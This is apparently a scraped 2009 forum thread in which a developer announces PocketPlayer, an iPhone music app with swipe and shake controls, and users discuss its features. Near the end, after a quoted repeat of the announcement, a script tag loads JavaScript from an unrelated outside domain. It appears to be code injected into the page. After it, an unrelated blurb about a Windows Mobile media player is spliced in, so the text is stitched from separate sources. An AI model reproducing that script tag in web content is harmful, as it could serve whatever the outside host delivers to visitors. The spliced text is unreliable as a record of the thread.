Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: PocketPlayer

Default PocketPlayer
    Hey out theire, im proud to announce you my first AppStore apllication. As you mybe know im the developer of FiveIRows

Here some info about it:

Did you ever get stock and bugged if you have to pull out your Device out of the small pocket to skip to the next song ?

This is now conclusion!

Because with PocketPlayer you can do this and other severeal commands right in your pocket. It`s amazing. Simple swipe from left on the display and you`ll hear the next song.

But this is not everything!

There are a lot of commands you can do. Such as doubletap on the screen to play or pause the player. And if you want to create a playlist then you can do this within this application. A "shake to next song" which is configurable in 3 steps is also an board. And because of the self developed BIBP Mode (battery and image burning protecture) it will use the least amount of your battery capacity. And the best feature is that you can personalize the player. Choose one of about 5 built in styles and one of the 2 backgrounds to make the player perfect for you.

Here now the full featurelist:
    .... complete reading in AppStore:

iTunes Store

You can also visit my support site :

- PocketPlayer

Thx a lot for your attention

Greets Mock

Any feedback on this ?
    Last edited by mock; 2009-09-05 at 02:41 PM. Reason: Automerged Doublepost

I don't get it.
    If I want to skip a song I double press the button on my headphones.
    This is to be used in your pocket? So it disables the auto-lock and wastes battery and is prone to accidental use?

Also if my iphone is in my trouser pockets, I don't want to be reaching in and shaking it to skip to the next song. This leads to strange looks and encounters with policemen.

Its for people who dont have the apple headphones. And for the strange looking while shaking you can simply swipe from left to right to skip to next song instead. And for the battery thing ive implemented the BIBP mode which will decrease the capacaty which it takes to minimum.

Would work well in combination with the "volume media settings" app (VMCsettings)

Someone hooked into my app :/ Search cydia for BIBPExtender :/

I took a deep look at the tweak and i say that im amazed of the new possibilie it offers . It turns ot blacklight when in bibomode and recovers it back to previous state if you leaves.

THC Crazy Hawks (dev of BIBP Extender )

Why not make the big play/pause button functional?
    When in normal mode if you click once on the button it would play/pause, but when in BIBP mode then use double click anywhere. The button is large enough so you can't miss it...

I think if its in pocket you cann miss it

Yeah but that's why there is BIBP...

jeah but i think i could implement an optien to chose from single or double tap

That would be even better.

Here's one of my ideas I was telling you about... A mahogany theme:

looks great

There is an amazing update in the way

Quote Originally Posted by mock View Post
    Hey out theire, im proud to announce you my first AppStore apllication. As you mybe know im the developer of FiveIRows

Here some info about it:

Did you ever get stock and bugged if you have to pull out your Device out of the small pocket to skip to the next song ?

This is now conclusion!

Because with PocketPlayer you can do this and other severeal commands right in your pocket. It`s amazing. Simple swipe from left on the display and you`ll hear the next song.

But this is not everything!

There are a lot of commands you can do. Such as doubletap on the screen to play or pause the player. And if you want to create a playlist then you can do this within this application. A "shake to next song" which is configurable in 3 steps is also an board. And because of the self developed BIBP Mode (battery and image burning protecture) it will use the least amount of your battery capacity. And the best feature is that you can personalize the player. Choose one of about 5 built in styles and one of the 2 backgrounds to make the player perfect for you.

Here now the full featurelist:
    .... complete reading in AppStore:

iTunes Store

You can also visit my support site :

- PocketPlayer

Thx a lot for your attention

Greets Mock

Any feedback on this ? <script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Do you like the iPhone’s flick-scrolling feature and media player UI, but just can’t part with your precious Windows Mobile device? Well, if you’re a proud owner of a touchscreen WinMo phone – that’s Windows Mobile 5.0 PocketPC or Windows Mobile 6.0 Professional – then Conduits’ Pocket Player 3.5 will satisfy your media-browsing demands.

With support for just about any media format you can think of, A2DP Bluetooth, internet connectivity, plug-ins, and that slick UI, Pocket Player 3.5 will make you feel a little better about your WinMo device’s media capabilities.

The video below basically shows you the trick appeal of the Pocket Player 3.5’s media-browsing capabilities.